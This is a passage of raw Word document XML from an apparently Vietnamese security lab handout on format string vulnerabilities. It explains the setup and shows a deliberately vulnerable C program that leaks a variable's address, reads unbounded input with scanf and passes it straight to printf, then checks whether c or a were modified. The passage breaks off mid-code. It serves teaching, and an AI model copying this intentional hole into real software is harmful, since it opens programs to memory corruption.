        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là các biến toàn cục đã có gán giá trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759ADE5C" w14:textId="77777777" w:rsidR="00FC3418" w:rsidRDefault="00FC3418" w:rsidP="00FC3418">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong source code có xuất địa chỉ của biến </w:t>
      </w:r>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC9E1D7" w14:textId="77777777" w:rsidR="00FC3418" w:rsidRDefault="00FC3418" w:rsidP="00FC3418">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Có lỗ hổng format string ở dòng 8 gọi printf() thứ 2.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="480"/>
        <w:gridCol w:w="9050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00153D16" w14:paraId="52E6A81C" w14:textId="77777777" w:rsidTr="00153D16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66837960"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lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB4549C"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200C27E9"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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7415201D"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BEAF8A"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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B626565"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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47242208"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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416AC1AA"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8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524505E2"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9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1735739C"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0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76298D97"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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3BBB41"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458C21C8"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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="052D004B"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51790D0E" w14:textId="77777777" w:rsidR="00153D16" w:rsidRP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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DC7CBE" w14:textId="77777777" w:rsidR="00153D16" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00153D16">
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A68793" w14:textId="77777777" w:rsidR="00B00B54" w:rsidRDefault="00B00B54" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F724664" w14:textId="1DECD0DA" w:rsidR="00BB2418" w:rsidRPr="00D04F54" w:rsidRDefault="00BB2418" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2045385A" w14:textId="156A70B3" w:rsidR="00153D16" w:rsidRPr="00D04F54" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>#include</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="cpf"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;stdio.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A8F86FA" w14:textId="77777777" w:rsidR="00153D16" w:rsidRPr="00D04F54" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="kt"/>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>456</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F39D3BB" w14:textId="77777777" w:rsidR="00153D16" w:rsidRPr="00D04F54" w:rsidRDefault="00153D16" w:rsidP="00BB2418">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="kt"/>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="nf"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387C552C" w14:textId="7633C72E"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kt"/>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>789</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14DC4138"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kt"/>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60BEB8B7"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n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>printf</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"%p</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="se"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC1273D"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n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>scanf</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"%s"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000B1213"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n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>printf</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C11E3F"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k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B22B55" w14:textId="087B4B93"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Pr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>puts</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00815A12">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidR="00AF534E">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>You m</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>odified c."</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68353830"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p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB9813F" w14:textId="431378B8"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Pr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>puts</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00815A12">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidR="00AF534E">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You </w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>modified a for a small number."</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A038BC"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p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:rStyle w:val="w"/>
